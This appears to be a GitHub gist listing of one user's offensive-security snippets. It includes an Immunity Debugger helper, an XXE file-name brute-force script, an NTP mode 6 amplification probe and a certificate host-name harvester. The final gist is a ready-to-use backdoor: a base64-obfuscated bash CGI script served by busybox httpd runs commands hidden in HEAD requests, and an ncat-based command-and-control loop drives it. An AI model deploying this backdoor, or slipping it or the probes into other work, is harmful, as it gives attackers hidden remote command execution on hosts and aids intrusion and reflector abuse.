
@themson
themson / endswap.py
Last active August 29, 2015 14:17
Immunity Debugger Endian Swap PyCommand
"""
Immunity Debugger Endian Swap
themson mester
endianswap.py simple script to swap byte order of addresses
"""
__VERSION__ = '1.1'
import immlib
@themson
themson / xxe_filebrute.sh
Last active August 29, 2015 14:14
Script for brute forcing file names via XML DTD Entities
#!/bin/bash
# script for brute forcing file names via XML DTD Entities
PATH_BASE=$1
FILE_LIST=$2
i=1;
CONCAT_ENT=""
CONCAT_HEAD="<!ENTITY file_list \""
CONCAT_TAIL="\" >"
# CONFIRM CLI ARGUMENT COUNT
@themson
themson / readvar_Mode_6_AMP_test.py
Created November 15, 2014 05:19
readvar_Mode_6_AMP_test
#!/usr/bin/env python
from scapy.all import *
import logging
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
dest_ip = sys.argv[1]
# NTP control packet (mode 6): first byte 0x16 = LI 0, version 2, mode 6; second byte 0x02 = opcode READVAR.
# Used to check whether a host answers mode 6 queries (and so could serve as an amplification reflector).
ntp6_readvar = (IP(dst=dest_ip)/UDP(dport=123)/Raw(load='\x16\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'))
@themson
themson / cert_alt_names.sh
Last active August 29, 2015 14:05
Search for host names in x509 alternate names extension
#!/bin/bash
TARGETS=$1
PORT=$2
OUTLOG=$3
HOSTLOG='https_hosts.log'
# Require exactly three arguments; exit non-zero on a usage error
if [ "$#" -ne 3 ]; then
    echo "Usage: $0 <targets.file> <port> <logfile>"
    exit 1
fi
@themson
themson / python logger.debug() stub
Last active August 29, 2015 14:05
stub for using python logging object
import logging

def toggle_debug(debug_state):
    # Return a module-level logger; when debug_state is True, attach a
    # stream handler so logger.debug() output is actually emitted.
    logger = logging.getLogger(__file__)
    if debug_state is True:
        logger.setLevel(logging.DEBUG)
        stream = logging.StreamHandler()
        stream.setLevel(logging.NOTSET)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s: "%(message)s"')
        stream.setFormatter(formatter)
        logger.addHandler(stream)
    return logger
@themson
themson / BUSYBOX_CGI_BACKDOOR
Last active July 19, 2017 11:40
CGI Based Backdoor using Busybox httpd applet:
CGI BASED BACKDOOR WITH BUSYBOX:
----------------------------------
mkdir -p /tmp/s/cgi-bin;(base64 -d <<<IyEvYmluL2Jhc2gKaWYgWyAiJFJFUVVFU1RfTUVUSE9EIiA9PSAiSEVBRCIgXSAmJiBbICIkSFRUUF9VU0VSX0FHRU5UIiA9PSAibm9wZSIgXTsgdGhlbgogICAgQz0kKGJhc2U2NCAtZCA8PDwgJFFVRVJZX1NUUklORykKICAgIGlmIFsgIiRDIiA9PSAiZXhpdCIgXTsgdGhlbgogICAgICAgIGVjaG8gIkNsZWFuIgogICAgICAgIHJtIC4vcAogICAgICAgIGtpbGwgJChwZ3JlcCBidXN5Ym94KQogICAgIGZpCiAgICAgZWNobyAkKGJhc2ggLWMgIiRDIikKZmkK)>/tmp/s/cgi-bin/p;chmod +x /tmp/s/cgi-bin/p; busybox httpd -f -p <LPORT> -h /tmp/s/; rm -rf /tmp/s/
C2:
---------------------
COMMAND=''; while [ "$COMMAND" != "exit" ]; do read -p "$ " COMMAND; echo -e "HEAD /cgi-bin/p?$(base64<<<$COMMAND) HTTP/1.0\nHost: \nUser-Agent: nope\n\n" | ncat <LHOST> <LPORT>; done